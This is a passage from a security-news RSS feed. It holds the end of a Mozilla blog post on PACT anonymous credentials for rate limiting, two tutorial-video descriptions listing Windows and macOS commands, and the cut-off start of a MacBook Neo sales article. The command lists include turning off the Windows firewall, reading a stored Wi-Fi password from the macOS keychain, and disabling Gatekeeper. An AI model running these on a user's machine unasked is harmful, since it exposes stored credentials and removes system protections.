<p><img alt="A diagram showing the protocol flow for Privacy Pass." class="aligncenter size-full wp-image-48375" height="1639" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-1.excalidraw1-scaled.png" width="2560"></p>
<p class="c27"><img alt="" title=""><span class="c20 c1 c57"><strong>Figure 1</strong>: </span><span class="c0"><em>In Privacy Pass, a CAPTCHA provider can issue tokens to a client which can then be used to bypass challenges for future site visits. Even if the CAPTCHA provider and sites collude, they can’t use the tokens to identify the user or their browsing history.</em> </span></p>
<p class="c52"><span class="c0">Privacy Pass has gone on to be successfully deployed in systems where the issuer and verifier have a prior trust relationship: </span><span class="c0">Apple</span><span class="c0"> uses it to authenticate users of </span><span class="c3 c1"><a class="c5" href="https://hacks.mozilla.org/feed/">Private Cloud Compute</a></span><span class="c0"> </span><span class="c1">and</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://www.apple.com/privacy/docs/iCloud_Private_Relay_Overview_Dec2021.PDF">Private Rel</a></span><span class="c17 c1"><a class="c5" href="https://www.google.com/url?q=https://www.apple.com/privacy/docs/iCloud_Private_Relay_Overview_Dec2021.PDF&amp;sa=D&amp;source=editors&amp;ust=1782228494402463&amp;usg=AOvVaw0KGoiSPg-8NLvNvIiSSbPt">ay</a></span><span class="c1"> </span><span class="c0">without linking their activity to their identity, </span><span class="c0">Chrome</span><span class="c0"> uses it for </span><span class="c3 c1"><a class="c5" href="https://github.com/GoogleChrome/ip-protection">two-hop IP protection</a></span><span class="c0">, and </span><span class="c0">Kagi</span><span class="c0"> uses it to provide </span><span class="c17 c1"><a class="c5" href="https://help.kagi.com/kagi/privacy/privacy-pass.html">private search</a></span><span class="c0">. </span><span class="c0">These deployments work in part because a small number of parties have agreed in advance on who issues tokens and who accepts them. </span></p>
<p class="c18"><span class="c0">Applying this approach to an open system where any site can act as</span><span class="c0"> an issuer</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://docs.google.com/document/d/1k3QJG2D_Sq4zJiJRn9DfY80hEHuz9UWrJdTt8LbRsMM/edit?tab=t.0#heading=h.r8jxzjcoeumo">brings real challenges</a></span><span class="c0">.</span><span class="c0"> Firstly, even though tokens are unlinkable, knowing a user has access to a specific issuer is a privacy leak on its own, because you can infer that the user meets the relevant issuance criteria. </span><span class="c1">If one site can learn that you have a token from another site, that reveals that you have been to that site, which can be a major privacy problem. </span><span class="c0">This compounds if </span><span class="c1">sites </span><span class="c0">can learn the set of issuers </span><span class="c1">you have visited</span><span class="c0">, since it becomes a fingerprint which can be used to identify </span><span class="c1">you</span><span class="c0">. </span></p>
<p class="c8"><span class="c3 c1"><a class="c5" href="https://blog.cryptographyengineering.com/2014/11/27/zero-knowledge-proofs-illustrated-primer/">Generic techniques</a></span><span class="c0"> exist for proving a statement in zero knowledge: we can prove that </span><span class="c1">a client</span><span class="c0"> ha</span><span class="c1">s</span><span class="c0"> a token from a set of acceptable issuers without revealing which specific issuer it is. We’ll call this issuer blinding. </span><span class="c0">The generic approach is often slow, but </span><span class="c3 c1"><a class="c5" href="https://www.ietf.org/archive/id/draft-orru-zkproof-sigma-protocols-01.html">bespoke approaches</a></span><span class="c0"> tailored to the underlying cryptography can improve this considerably. </span></p>
<p class="c54"><span class="c0">Another challenge is how sites using rate limits decide who to trust to issue tokens. If an issuer misbehaves then the site’s rate limits become ineffective, enabling volumetric abuse. However, if we need to prevent the site from learning which issuers a user has access to, the site is only going to know that one of its trusted issuers was used, not which one. This makes mistakes or misbehaviour by an issuer difficult to detect, and makes it hard for sites to evaluate new issuers. Solving this challenge is essential for openness. Without adequate information, </span><span class="c0">sites are likely to lean towards conservative issuer selection. </span><span class="c1">That could lead to less choice between Anchors, which in turn could lead to a new form of gatekeeper being created.</span><span class="c0"> </span></p>
<p class="c32"><span class="c0">To solve this, sites at least need a way to calculate an aggregate score for each issuer they use. This should roughly correspond to how much of the traffic it considers abusive to have come from users using that particular issuer. Mozilla has long invested in systems like </span><span class="c3 c1"><a class="c5" href="https://blog.mozilla.org/en/firefox/partnership-ohttp-prio/">Prio</a></span><span class="c0"> which use multiparty computation (MPC) to protect user privacy whilst enabling aggregate measurements of system behaviour. </span></p>
<p class="c59"><span class="c0">Privacy Pass also struggles to handle dynamic adjustments to rate limits. Once tokens have been issued, they’re difficult to invalidate without either revoking all active tokens or risking attacks which can compromise the privacy of users. It’s also beneficial if sites can adjust rate limits on a per </span><span class="c1">client</span><span class="c0"> basis, for example by increasing rate limits where they become more confident the </span><span class="c1">client</span><span class="c0"> is benign and withdrawing access </span><span class="c1">when abuse is detected</span><span class="c0">. </span></p>
<p class="c47"><span class="c3 c1"><a class="c5" href="https://www.ietf.org/archive/id/draft-schlesinger-cfrg-act-00.html">Anonymous Credit Tokens</a></span><span class="c0"> </span><span class="c0">offer a useful building block to solve this problem. Conventional Privacy Pass schemes rely on issuing a bucket of tokens but ACT works differently by enabling the use of a credential with state. For example, an ACT credential can hold an internal counter. When the credential is presented, the site can check the counter is over some threshold and mutate it, increasing or decreasing </span><span class="c1">the counter whenever</span><span class="c0"> the site’s perception of the holder has improved or worsened. Critically, the exact value is never leaked to the site, preventing the site from tracking the holder and ensuring successive presentations of the same credential can’t be linked. </span></p>
<h3 class="c24"><span class="c2 c1">Putting it together </span></h3>
<p class="c19"><span class="c1">So how can we combine these techniques to build a system which can enable privacy-preserving rate limiting on the open web? In May 2026, we participated in a </span><a href="https://pactworkshop.com/"><span class="c17 c1">W3C CG Meeting</span></a><span class="c0"> in collaboration with Cloudflare, Chrome and other web stakeholders in which we started sketching out a design we’re calling PACT – Private Access Control Tokens. </span></p>
<p class="c19"><span class="c0">Rate limits need a starting point, a source of scarcity to anchor on. We’ll call an entity that provides such a source an </span><span class="c2 c1">Anchor</span><span class="c0">. To a user who meets the Anchor’s criteria, like having a subscription,</span><span class="c0"> an account in good standing</span><span class="c0">, or a verified phone number, an Anchor issues a batch of </span><span class="c2 c1">Endorsement </span><span class="c0">tokens, following the Privacy Pass model. In practice, Anchors could be any website which has access to this kind of signal. An Endorsement conveys</span><span class="c1"> </span><span class="c0">scarcity to other sites. </span></p>
<p class="c51"><span class="c0">That’s enough for a simple system where access is </span><span class="c1">either granted or denied</span><span class="c0">. But as we discussed earlier, we also want the ability to increase access where a visitor behaves benignly and decrease it where they don’t. </span><span class="c1">The state needed to enforce a rate limit</span><span class="c0"> can’t live in the Endorsement, because Endorsements cross trust boundaries between unrelated sites. We need a second object that can hold that state, scoped to the party that maintains it. </span></p>
<p class="c48"><span class="c0">We’ll call that the party that handles rate limiting for a site a </span><span class="c2 c1">Moderator </span><span class="c0">and the stateful object a </span><span class="c2 c1">Credential</span><span class="c0">. </span><span class="c1">A Credential is specific to a Moderator and, unlike endorsements, we limit each site to nominating a single Moderator. In the common case the site itself plays the Moderator role, so there’s no new entity or trust boundary. </span><span class="c1">A Moderator can also be a third-party service shared across many sites, allowing those sites to cooperatively share a rate limit.</span><span class="c0"> </span></p>
<p class="c48"><span class="c0">In the terminology of the previous section, the Anchor is the issuer of Endorsements, and the Moderator both verifies Endorsements and issues Credentials. A Moderator manages rate-limit policy: it decides which Anchors it trusts, accepts their Endorsements, and issues a Credential in return.</span></p>
<p class="c14"><img alt="" title=""><img alt="A diagram showing an overview of the PACT system" class="aligncenter size-full wp-image-48381" height="1655" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-5.excalidraw21-scaled.png" width="2560"></p>
<p class="c14"><strong><span class="c1 c20">Figure 2: </span></strong><span class="c1"><em>(1) Clients acquire Endorsements from Anchors in the course of normal browsing to sites they have relationships with. (2) Clients can exchange Endorsements for a stateful Credential from a Moderator. (3) Credentials can be used to access sites which use that Moderator. Credentials can be updated over time.</em> </span></p>
<p class="c41"><span class="c0">Directly revealing which Anchor backed an Endorsement would leak a lot of information about the user. The issuer blinding techniques from the previous section solve this: when an Endorsement is redeemed, the Moderator only learns that it came from one of </span><span class="c1">the </span><span class="c0">Anchors it trusts, but not which one. </span></p>
<p class="c28"><span class="c0">When a Moderator covers more than one site, we let Credentials be presented across all of them but partition cookies and storage as</span><span class="c1"> we would for any other third party site</span><span class="c0">. The unlinkability of </span><span class="c1">Credential</span><span class="c0"> presentations keeps this from creating a new cross-site identifier. The benefit is that good behaviour on one site improves access on every site the Moderator covers, and bad behaviour cuts it everywhere. Websites can already build the same capability with a shared account system, so this doesn’t create a new way to lock users out, but it </span><span class="c1">does provide a</span><span class="c0"> new way to grant access without requiring users to give up their privacy. </span></p>
<p class="c28"><span class="c0">Enabling Moderators that cover many sites carries a centralisation risk, simila</span><span class="c1">r </span><span class="c0">to the concentration we see today in anti-abuse providers. The mitigation is that the choice of Moderator stays with each site, and the choice of trusted Anchors stays with each Moderator. Th</span><span class="c1">is</span><span class="c0"> </span><span class="c1">can’t</span><span class="c0"> reverse the centralisation pressure the web already faces, but it </span><span class="c1">ensures this system won’t lead to additional lock-in</span><span class="c0">: a new Anchor or a new Moderator can be adopted without coordinating with a dominant vendor. </span></p>
<p class="c46"><span class="c0">The </span><span class="c1">system then has three flows</span><span class="c0">.</span><span class="c0"> First, the user </span><span class="c1">receives</span><span class="c0"> Endorsements from an Anchor in the course of normal interaction</span><span class="c1">, based on the Anchor’s positive view of the user</span><span class="c0">. This is </span><span class="c0">a relatively rare operation for any given user and Anchor. After all, as our source of scarcity, Endorsements should not be too easy to accumulate.</span></p>
<p class="c10"><img alt="" title=""><img alt="A diagram showing the PACT Anchor Flow" class="aligncenter size-full wp-image-48377" height="1789" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-3.excalidraw1-scaled.png" width="2560"></p>
<p class="c10"><strong><span class="c20 c1">Figure 3</span></strong><span class="c1">: <em>In the course of normal browsing, clients browse to websites they have a relationship with. These sites can act as Anchors by issuing Endorsements to clients.</em></span></p>
<p class="c26"><span class="c0">Second, when the user arrives at a site that works with a Moderator, the browser spends an Endorsement from an Anchor the Moderator trusts and receives a Credential in return. The presentation hides </span><span class="c13 c11 c1">which </span><span class="c0">Anchor was used, and </span><span class="c1">neither the Anchor nor the Moderator can trace the Endorsement back to where it was issued</span><span class="c0">. The Moderator decides what initial balance the Credential starts with. If the user has no Endorsements from suitable Anchors at all, existing mechanisms (CAPTCHAs, account creation, federated login) </span><span class="c1">could be used to</span><span class="c0"> bootstrap a Credential the same way, so the system degrades to today’s experience rather than locking the user out.</span></p>
<p class="c7"><img alt="" title=""><img alt="A diagram showing the protocol flow between Anchors and Moderators" class="aligncenter size-full wp-image-48378" height="1789" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-4.excalidraw1-scaled.png" width="2560"></p>
<p class="c7"><span class="c20 c1"><strong>Figure 4</strong></span><span class="c1"><strong>:</strong><em> When the client browses to a site, it can prompt the client for a Credential from the Moderator it uses. If the Client doesn’t have a suitable Credential, but does have a suitable Endorsement, it can exchange it for a Credential with the Moderator. In practice, the Moderator and the Site might be the same server. </em></span><em><span class="c0"> </span></em></p>
<p class="c25"><span class="c0">Third, as the user browses, the browser presents the Credential and the Moderator updates </span><span class="c1">the internal state of the Credential</span><span class="c0">. The </span><span class="c1">Moderator can reward </span><span class="c0">behaviour that looks benign and </span><span class="c1">penalize suspicious activity</span><span class="c0">, </span><span class="c1">but can’t track the use of the Credential or identify it if it’s used on other sites the Moderator covers</span><span class="c0">. </span><span class="c0">Revocation falls out of the same mechanism: a Moderator </span><span class="c1">can refuse to return an updated Credential</span><span class="c0">.</span><span class="c0"> </span></p>
<p class="c7"><img alt="" title=""><img alt="A diagram showing the PACT Moderator Flow" class="aligncenter size-full wp-image-48379" height="1618" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-5.excalidraw1-scaled.png" width="2560"></p>
<p class="c7"><strong><span class="c20 c1">Figure 5</span></strong><span class="c0"><strong>:</strong> <em>The Client can present the Credential on sites which use the matching Moderator. Sites can check if the Credential is in good standing. The sites can then adjust the access the Credential has in response to behaviour. E.g. increasing it when they gain confidence in the client or reducing it in response to malicious behaviour.</em></span></p>
<p class="c23"><span class="c0">In practice, all of this would happen transparently to the user through a WebAPI that sites acting as Anchors or Moderators would call from JavaScript. In an ideal ecosystem, users would accumulate Endorsements through normal browsing, just by virtue of the sites they already visit, and the rest of the flow would happen in the background as they move around the web, leaving </span><span class="c1">users</span><span class="c0"> with meaningfully less friction. </span></p>
<p class="c16"><span class="c0">AI agents acting on behalf of a user slot into the same flow. An agent can carry its user’s Credentials, in which case the user remains accountable for how the agent </span><span class="c1">behaves.</span><span class="c0"> </span><span class="c1">S</span><span class="c0">ites would not need to grant any more access than they would to the user themselves. Alternatively, the operator of an agent can run its own Anchor and vouch for its agents the way other Anchors vouch for human users. </span><span class="c0">Sites retain control over which Anchors they accept, so they can choose how to treat agent traffic without needing a separate detection mechanism. </span></p>
<p class="c6"><span class="c0">Several mechanisms combine to keep the information about a user that flows out close to a single bit. Cryptographic unlinkability ensures successive Credential presentations cannot be tied to each other or to the original issuance, so a user’s visits cannot be </span><span class="c1">joined</span><span class="c0"> into a history. Each site is bound to a single Moderator, so the set of Moderators a user has Credentials with never becomes a cross-site fingerprint. The Anchor-to-Credential exchange happens in an isolated browsing context, so during ordinary browsing the only thing the site or its Moderator ever observes is a Credential presentation: </span><span class="c1">the site only learns if </span><span class="c0">the user has a valid Credential below the rate limit, or </span><span class="c1">nothing</span><span class="c0">. </span><span class="c1">W</span><span class="c0">hen the Moderator updates a </span><span class="c1">Credential</span><span class="c0">, it</span><span class="c0"> adjusts the credentials state without learning what it is.</span></p>
<p class="c6"><span class="c1">The additional privacy given to users from </span><span class="c0">Issuer blinding</span><span class="c1"> makes participating in the system more challenging for Moderators</span><span class="c0">. Because the Moderator can’t see which Anchor backed a Credential at issuance, it can’t give a Credential from a strong Anchor </span><span class="c1">more access</span><span class="c0"> than one from a weak Anchor: doing so would itself leak which Anchor was used. The initial </span><span class="c1">access</span><span class="c0"> has to be uniform across the Moderator’s whole pool of Anchors, which in practice means setting it at the strength of the weakest. </span><span class="c1">However, this is only relevant for that initial access, the Moderator can update credentials according to the holder’s behavior, enabling Credential’s to accrue access over time.</span></p>
<p class="c42"><span class="c0">Building an open ecosystem also requires that sites can make effective decisions about the Anchors they choose to trust</span><span class="c1">. M</span><span class="c0">ultiparty computation systems like </span><span class="c0">Prio</span><span class="c0"> enable aggregate scoring without compromising pr</span><span class="c1">ivacy</span><span class="c0">. When users present Credentials, they can provide an encrypted share which identifies the anchor they use</span><span class="c1">d and can be privately aggregated to compute the quality of an issuer.</span></p>
<h3 class="c24"><span class="c2 c1">Next Steps </span></h3>
<p class="c49"><span class="c1">We think the</span><span class="c0"> architecture we</span><span class="c1">’ve </span><span class="c0">sketched </span><span class="c1">for PACT </span><span class="c0">has the right shape, but many of the details still need to be worked out</span><span class="c1"> and the entire system needs rigorous privacy and security analysis.</span></p>
<p class="c45"><span class="c0">We want to do that work in the open. The IETF is the natural venue for the cryptographic protocols underneath, and the W3C for the WebAPI surface that sits on top. </span><span class="c0">We’ll be </span><span class="c1">bringing</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://github.com/Moderation-of-unLinkable-Endorsements">draft specifications</a></span><span class="c1"> to these bodies as soon as they’re ready</span><span class="c0">, and we welcome collaborators from across the ecosystem: browser vendors, site operators, anti-abuse providers, and the cryptography community. </span></p>
<p class="c29"><span class="c0">If successful, we think we can provide a system which will keep the web open and </span><span class="c1">private</span><span class="c0">, while still giving sites the rate-limiting signal they need. </span></p>
<h3 class="c29"><span class="c2 c1">Acknowledgements</span></h3>
<p class="c4"><em><span class="c11 c1">The ideas described here are the result of collaboration and conversations with many people, including: Watson Ladd, Thibault Meunier, Michele Orrù, Trevor Perrin, Eric Rescorla, Samuel Schlesinger, Martin Thomson, Eric Trouton, Benjamin Vandersloot &amp; Cathie Yun.</span></em><span class="c11 c1"><em> </em> </span></p>
<hr class="c58">
<div>
<p class="c31"><a href="https://hacks.mozilla.org/?p=48374#:~:text=%5B1%5D">[1]</a><span class="c0"> PAT requires that the source of scarcity and an independent issuer be trusted not to collude. If they do, they can track users as they interact with the system. This is not suitable in the context of an open system where any party could play those two roles.</span></p>
</div>
<p>The post <a href="https://hacks.mozilla.org/2026/06/pact-anonymous-credentials-for-the-web/">PACT: Anonymous Credentials for the Web</a> appeared first on <a href="https://hacks.mozilla.org/">Mozilla Hacks - the Web developer blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[40 Windows Commands you NEED to know (in 10 Minutes)]]></title>
<description><![CDATA[Author: NetworkChuck - Bewertung: 180418x - Views:4300547 Keep your computer safe with BitDefender: https://bit.ly/BitdefenderNC  (59% discount on a 1 year subscription)


Here are the top 40 Windows Command Prompt commands you need to know!! From using ipconfig to check your IP Address to using ...]]></description>
<link>https://tsecurity.de/de/3693273/videos/40-windows-commands-you-need-to-know-in-10-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693273/videos/40-windows-commands-you-need-to-know-in-10-minutes/</guid>
<pubDate>Sat, 25 Jul 2026 08:36:52 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NetworkChuck - Bewertung: 180418x - Views:4300547 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Jfvg3CS1X3A?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Keep your computer safe with BitDefender: https://bit.ly/BitdefenderNC  (59% discount on a 1 year subscription)<br />
<br />
<br />
Here are the top 40 Windows Command Prompt commands you need to know!! From using ipconfig to check your IP Address to using the shutdown command to automatically boot to bios, these commands are essential for any Windows user. Also, is your computer running slow? We show a series of commands that will speed up your computer without having to reinstall Windows. All of these commands should work on Windows 10 and Windows 11 and all you need to do is launch your windows command prompt (cmd). <br />
<br />
<br />
<br />
<br />
🔥🔥Join NetworkChuck Academy: https://ntck.co/NCAcademy<br />
<br />
<br />
<br />
**Sponsored by Bitdefender <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
SUPPORT NETWORKCHUCK<br />
---------------------------------------------------<br />
➡️NetworkChuck membership: https://ntck.co/Premium<br />
☕☕ COFFEE and MERCH: https://ntck.co/coffee<br />
<br />
Check out my new channel: https://ntck.co/ncclips<br />
<br />
🆘🆘NEED HELP?? Join the Discord Server: https://discord.gg/networkchuck<br />
<br />
STUDY WITH ME on Twitch: https://bit.ly/nc_twitch<br />
<br />
READY TO LEARN??<br />
---------------------------------------------------<br />
-Learn Python: https://bit.ly/3rzZjzz<br />
-Get your CCNA: https://bit.ly/nc-ccna<br />
<br />
0:00   ⏩  Intro<br />
0:15   ⏩  Launch Windows Command Prompt<br />
0:18   ⏩  ipconfig<br />
0:25   ⏩  ipconfig /all<br />
0:33   ⏩  findstr<br />
0:49   ⏩  ipconfig /release<br />
0:56   ⏩  ipconfig /renew<br />
1:15   ⏩  ipconfig /displaydns<br />
0:56   ⏩  ipconfig /renew<br />
1:29   ⏩  clip<br />
1:47   ⏩  ipconfig /flushdns<br />
2:09   ⏩  nslookup<br />
2:41   ⏩  cls<br />
2:51   ⏩  getmac /v<br />
3:01   ⏩  powercfg /energy<br />
3:10   ⏩  powercfg /batteryreport<br />
3:28   ⏩  assoc<br />
3:51   ⏩  Is your computer slow???<br />
3:56   ⏩  chkdsk /f<br />
4:07   ⏩  chkdsk /r<br />
4:17   ⏩  sfc /scannnow<br />
4:36   ⏩  DISM /Online /Cleanup /CheckHealth<br />
4:45   ⏩  DISM /Online /Cleanup /ScanHealth<br />
4:51   ⏩  DISM /Online /Cleanup /RestoreHealth<br />
5:24   ⏩  tasklist<br />
5:38   ⏩  taskkill<br />
5:59   ⏩  netsh wlan show wlanreport<br />
6:18   ⏩  netsh interface show interface<br />
6:27   ⏩  netsh interface ip show address | findstr “IP Address”<br />
6:30   ⏩  netsh interface ip show dnsservers<br />
6:36   ⏩  netsh advfirewall set allprofiles state off<br />
6:43   ⏩  netsh advfirewall set allprofiles state on<br />
6:49   ⏩  SPONSOR - BitDefender<br />
8:19   ⏩  ping<br />
8:30   ⏩  ping -t<br />
8:41   ⏩  tracert<br />
8:59   ⏩  tracert -d<br />
9:06   ⏩  netstat<br />
9:12   ⏩  netstat -af<br />
9:28  ⏩  netstat -o<br />
9:38  ⏩  netstat -e -t 5<br />
9:47   ⏩  route print<br />
9:58   ⏩  route add<br />
10:13 ⏩  route delete<br />
10:21 ⏩  shutdown /r /fw /f /t 0<br />
<br />
<br />
FOLLOW ME EVERYWHERE<br />
---------------------------------------------------<br />
Instagram: https://www.instagram.com/networkchuck/<br />
Twitter: https://twitter.com/networkchuck<br />
Facebook: https://www.facebook.com/NetworkChuck/<br />
Join the Discord server: http://bit.ly/nc-discord<br />
<br />
<br />
<br />
<br />
AFFILIATES &amp; REFERRALS<br />
---------------------------------------------------<br />
(GEAR I USE...STUFF I RECOMMEND)<br />
My network gear: https://geni.us/L6wyIUj<br />
Amazon Affiliate Store: https://www.amazon.com/shop/networkchuck<br />
Buy a Raspberry Pi: https://geni.us/aBeqAL<br />
Do you want to know how I draw on the screen?? Go to https://ntck.co/EpicPen and use code NetworkChuck to get 20% off!! <br />
<br />
<br />
<br />
#windows11 #commandprompt #cmd<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[50 macOS Tips and Tricks Using Terminal (the last one is CRAZY!)]]></title>
<description><![CDATA[Author: NetworkChuck - Bewertung: 31462x - Views:990975 I know your password. Change it with Dashlane: https://www.dashlane.com/networkchuck50 (Use code networkchuck50 to get 50% off) 

In this video, NetworkChuck shows you the top 50 MacOS terminal commands you NEED to know. Now, while Mac OS is...]]></description>
<link>https://tsecurity.de/de/3693272/videos/50-macos-tips-and-tricks-using-terminal-the-last-one-is-crazy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693272/videos/50-macos-tips-and-tricks-using-terminal-the-last-one-is-crazy/</guid>
<pubDate>Sat, 25 Jul 2026 08:36:50 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NetworkChuck - Bewertung: 31462x - Views:990975 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qOrlYzqXPa8?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>I know your password. Change it with Dashlane: https://www.dashlane.com/networkchuck50 (Use code networkchuck50 to get 50% off) <br />
<br />
In this video, NetworkChuck shows you the top 50 MacOS terminal commands you NEED to know. Now, while Mac OS is unix-based and very similar to Linux, it has its nuances and things worth paying attention to. Things like, making your Macbook talk, finding wifi passwords, diving into the matrix and taking a trip to the aquarium, all from your terminal. <br />
<br />
<br />
<br />
<br />
🔥🔥Join Hackwell Academy: https://ntck.co/NCAcademy<br />
<br />
<br />
<br />
**Sponsored by Dashlane<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
SUPPORT NETWORKCHUCK<br />
---------------------------------------------------<br />
➡️NetworkChuck membership: https://ntck.co/Premium<br />
☕☕ COFFEE and MERCH: https://ntck.co/coffee<br />
<br />
Check out my new channel: https://ntck.co/ncclips<br />
<br />
🆘🆘NEED HELP?? Join the Discord Server: https://discord.gg/networkchuck<br />
<br />
STUDY WITH ME on Twitch: https://bit.ly/nc_twitch<br />
<br />
READY TO LEARN??<br />
---------------------------------------------------<br />
-Learn Python: https://bit.ly/3rzZjzz<br />
-Get your CCNA: https://bit.ly/nc-ccna<br />
<br />
FOLLOW ME EVERYWHERE<br />
---------------------------------------------------<br />
Instagram: https://www.instagram.com/networkchuck/<br />
Twitter: https://twitter.com/networkchuck<br />
Facebook: https://www.facebook.com/NetworkChuck/<br />
Join the Discord server: http://bit.ly/nc-discord<br />
<br />
0:00   ⏩  Intro<br />
0:12   ⏩  say<br />
0:23   ⏩  security find-generic-password -wa Wifi<br />
0:40   ⏩  pbcopy<br />
0:54   ⏩  command + option + shift + v<br />
1:08   ⏩  caffeinate<br />
1:20   ⏩  command + shift + 3<br />
1:53   ⏩  defaults write com.apple.screencapture name<br />
 2:10  ⏩  defaults write com.apple.screencapture type<br />
 2:19  ⏩  default write com.apple.screencapture location ~/Desktop/screenshots<br />
2:40   ⏩  passwd<br />
4:11   ⏩  cd<br />
4:17   ⏩  ls<br />
4:20   ⏩  pwd<br />
4:26   ⏩  whoami<br />
4:32   ⏩  mv<br />
4:36   ⏩  cp<br />
4:41   ⏩  ditto<br />
4:48   ⏩  df -h<br />
4:51   ⏩  nano<br />
5:00   ⏩  man<br />
5:09   ⏩  open<br />
5:18   ⏩  ping<br />
5:25   ⏩  ifconfig<br />
5:36   ⏩  grep<br />
5:43   ⏩  awk<br />
5:53   ⏩  traceroute<br />
6:04   ⏩  dig<br />
6:12   ⏩  ps<br />
6:21   ⏩  top<br />
6:31   ⏩  kill<br />
6:47   ⏩  which $SHELL<br />
6:56   ⏩  bash<br />
7:00   ⏩  zsh<br />
7:05   ⏩  uptime<br />
7:10   ⏩  killall mDNSResponder….and more<br />
7:15   ⏩  qlmanage<br />
7:22   ⏩  diff<br />
7:27   ⏩  curl<br />
7:42   ⏩  leave<br />
7:54   ⏩  history<br />
7:59   ⏩  disable gatekeeper<br />
8:20   ⏩  brew<br />
8:46   ⏩  cmatrix<br />
9:02   ⏩  asciiquarium<br />
9:13   ⏩  toilet<br />
9:31   ⏩  tetris<br />
9:48   ⏩  python3<br />
10:18 ⏩  shutdown<br />
10:33 ⏩  sudo touch id<br />
<br />
<br />
AFFILIATES &amp; REFERRALS<br />
---------------------------------------------------<br />
(GEAR I USE...STUFF I RECOMMEND)<br />
My network gear: https://geni.us/L6wyIUj<br />
Amazon Affiliate Store: https://www.amazon.com/shop/networkchuck<br />
Buy a Raspberry Pi: https://geni.us/aBeqAL<br />
Do you want to know how I draw on the screen?? Go to https://ntck.co/EpicPen and use code NetworkChuck to get 20% off!! <br />
<br />
<br />
<br />
#MacOS #Terminal #brew<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacBook Neo’s success wasn’t luck, it was a plan]]></title>
<description><![CDATA[It’s difficult to ignore the fact that Apple seems to have turned its MacBook Neo into a weapon to promote platform growth, with enough performance under the hood to make competitors seem inferior.



And even as the PC industry moves to try to compete with Apple’s last huge Mac success, the comp...]]></description>
<link>https://tsecurity.de/de/3693115/it-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693115/it-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</guid>
<pubDate>Sat, 25 Jul 2026 06:47:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s difficult to ignore the fact that Apple seems to have <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">turned its MacBook Neo into a weapon</a> to promote platform growth, with enough performance under the hood to make competitors seem inferior.</p>



<p class="wp-block-paragraph">And even as the PC industry moves to try to compete with Apple’s last <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">huge Mac success</a>, the company is already planning a powerful follow-up.</p>



<p class="wp-block-paragraph">That points to the discipline Apple has applied to the Mac since the introduction of Apple Silicon. The company has built a clear product roadmap, strong entry-level pricing, and steady performance gains. This focus is now paying dividends, giving people the impetus to keep placing their trust in Apple and its Macs — even as the industry raises prices in the face of RAMageddon and price increases. </p>



<h2 class="wp-block-heading"><strong>The numbers don’t lie</strong></h2>



<p class="wp-block-paragraph">“Apple’s recent price increase seems to be an inevitable response to these cost increases. In the second half of the year, other PC OEMs are expected to continue to raise prices, and the overall ASP increase is expected to continue,” <a href="https://counterpointresearch.com/en/insights/global-pc-shipments-decline-q2-2026-memory-crisis" data-type="link" data-id="https://counterpointresearch.com/en/insights/global-pc-shipments-decline-q2-2026-memory-crisis" target="_blank" rel="noreferrer noopener">Counterpoint said in a post Wednesday</a>. The researcher tells us global PC shipments shrank 4% in the second quarter of 2026 as rising costs hit demand. The Mac maker, by contrast, moved in the opposite direction, generating 13% growth in the quarter — mainly on the back of the MacBook Neo introduction. </p>



<p class="wp-block-paragraph"><a href="https://www.idc.com/resource-center/press-releases/2q26-pc-top5/" target="_blank">Recent IDC data</a> gives Apple 10.1% year-over-year growth and just under 10% (9.9% to be exact) of the worldwide PC market, even as the overall market declined 4.9%.</p>



<p class="wp-block-paragraph">“With emerging supply chain and tariff challenges inflating memory prices…, Apple’s incredibly aggressive price-point for the MacBook Neo makes its release feel all the more like a gut punch to one of the PC market’s most valuable price tiers,” Futurum Research Director <a href="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html" data-type="link" data-id="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html">Olivier Blanchard said when the Neo was released</a>. </p>



<h2 class="wp-block-heading"><strong>Neo 2.0 is already coming</strong></h2>



